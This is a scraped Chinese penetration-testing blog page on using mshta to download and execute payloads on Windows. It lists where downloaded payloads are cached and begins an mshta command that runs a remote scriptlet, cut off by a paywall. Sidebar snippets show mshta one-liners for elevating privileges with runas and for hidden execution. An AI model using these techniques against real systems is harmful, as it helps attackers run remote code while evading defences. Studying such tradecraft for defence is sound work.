Windows文件传输及执行—mshta

最新推荐文章于 2023-12-26 09:39:03 发布
最新推荐文章于 2023-12-26 09:39:03 发布
阅读量2.5k 收藏
点赞数
分类专栏: 渗透测试 # Windows文件传输及执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27828281/article/details/103628411
版权

声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。

 取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>

使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

 在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。

Mshta下载&执行

mshta支持2种文件格式的执行,其中执行.sct文件的命令格式如下:

mshta vbscript:Close(Execute("GetObject(""script:https:
最低0.47元/天 解锁文章
h8x0r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows文件下载执行的15种姿势1
08-03
第二种,远程下载执行执行过程没有二进制文件落地,这种方式已然成为后门文件下载执行的首要方式。在这里,本文收集了15种常见的文件下载执行的方式,并结合具体案例,
利用mshta调用运行js或vbs的
09-06
mshta同时调用js和vbs
mshta简介
wkm
12-14 6071
mshta.exe,HTML Application HOST,HTML应用程序主机,hta文件解释器(也能解释html),就如同IE是html的解释器,CMD是批处理文件的解释器,WScript.exe、CScript.exe是vbs/js脚本的解释器。mshta的命令行参数似乎并未公开,mshta /? 等方式得不到任何帮助信息。大家如果感兴趣可以去csdn或微软的msdn查查。从网上我仅找到...
mshta工具的使用
b312738566的博客
12-26 673
gpedit.msc->用户配置->管理模板->系统->不要运行指定windows程序->已启用->显示->加入禁用->应用->运行linux生成的链接命令;
Windows7系统mshta.exe文件丢失问题
amio555的专栏
12-21 858
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个mshta.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现mshta.exe丢失要怎么解决?
【Window】定时任务执行提示找不到文件的原因
2024 做自己的太阳
11-30 9260
上一个文章bat脚本引起的问题:【Selenium】window让bat脚本后台运行,周期重置standalone服务 背景: 为了让bat文件执行不会有黑窗口停留,所以再脚本中加入了一下内容 @echo off :: 这里控制脚本的后台执行 if "%1" == "h" goto begin mshta vbscript:createobject("wscript.shell").run...
Windows Bat脚本-快速切换Java版本
最新发布
03-13
在脚本开头,使用mshta命令获取管理员执行权限,确保脚本可以成功执行需要管理员权限的操作。 显示当前JDK版本: 使用java -version命令显示当前系统中已安装的Java版本信息。 列出可选操作: 遍历脚本所在目录下...
第七十五课:基于白名单Mshta.exe执行payload第五季.docx
09-15
第七十五课:基于白名单Mshta.exe执行payload第五季.docx
mshta.exe
01-12
mshta
mshta命令用法示例(在dos命令弹出消息框)
liaomin416100569的专栏
09-25 1万+
JS:  复制代码代码如下: mshta vbscript:window.execScript("alert('hello world!');","javascript")  VBS:  复制代码代码如下: mshta javascript:window.execScript("msgBox('hello world!'):window.clo
使用mshta调用js或vbs脚本隐藏cmd窗口
萧海的博客
12-17 459
【代码】使用mshta调用js或vbs脚本隐藏cmd窗口。
windows控制定时关键脚本编写
zw1996的博客
06-11 276
windows控制定时关键脚本编写 完成定时关机
cscript 执行代码_在Windows执行恶意代码 by cscript&mshta
weixin_28950403的博客
01-17 1370
Windows自带的可执行文件+合理构造的payload脚本=获得会话cscript简介在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript。WSH环境包括两个脚本宿主:基于控制台的CScript和基于GUI的WScript。这两个脚本宿主提供几乎相同的功能,在大多数情况下,使用哪个脚本宿主来运行脚本并不重要。两个例外在于您如何与脚本交互; 也就是说,...
Win10 cmd以管理员运行
wojuzi的博客
03-21 359
@echo off %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
批处理文件
BoArmy的专栏
03-09 5372
基础部分: ====================================================================== 一、基础语法: 1.批处理文件是一个“.bat”结尾的文本文件,这个文件的每一行都是一条DOS命令。可以使用任何文本文件编辑工具创建和修改。 2.批处理是一种简单的程序,可以用 if 和 goto 来控制流程,也可以使用 for 循环
bat脚本中以管理员权限执行命令
热门推荐
脚印
03-29 2万+
在bat脚本文件第一行加上下面命令: %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
做一个困难重重的hta下载者
ccx_john的专栏
12-07 1442
作者:lcx 一、先说本blog上有两个比较新颖的vbs下载者,一个是利用CDO.Message组件做的,参见http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html;另一个是用Microsoft.XMLDOM做的,参见http://hi.baidu.com/myvbscript/blog/item/b64592
windows开机启动bat脚本
08-19
要实现在Windows开机时启动bat脚本,可以按照以下步骤操作: 1. 首先,将要启动的bat脚本复制到Windows启动文件夹中。可以通过以下路径访问该文件夹:C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。将bat文件粘贴到该文件夹中。 2. 接下来,需要编辑bat文件,确保它在后台启动并且不显示cmd终端窗口。可以在bat文件的开头添加以下代码实现这一点: ``` if "%1"=="h" goto begin start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit :begin ``` 这段代码会检查是否传入了"h"参数,如果传入了,则后台启动bat脚本并关闭终端窗口。 3. 最后,重新启动计算机,bat脚本将会在Windows开机时自动执行。 请注意,以上步骤适用于将bat脚本添加到当前用户的启动文件夹中。如果需要将bat脚本添加到所有用户的启动文件夹中,可以将bat文件复制到以下路径:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup。 参考资料: <span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [bat脚本启动Java服务](https://blog.csdn.net/weixin_43763430/article/details/127946943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [Windows创建bat运行脚本、设置开机自启](https://blog.csdn.net/ppp1512/article/details/126289825)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值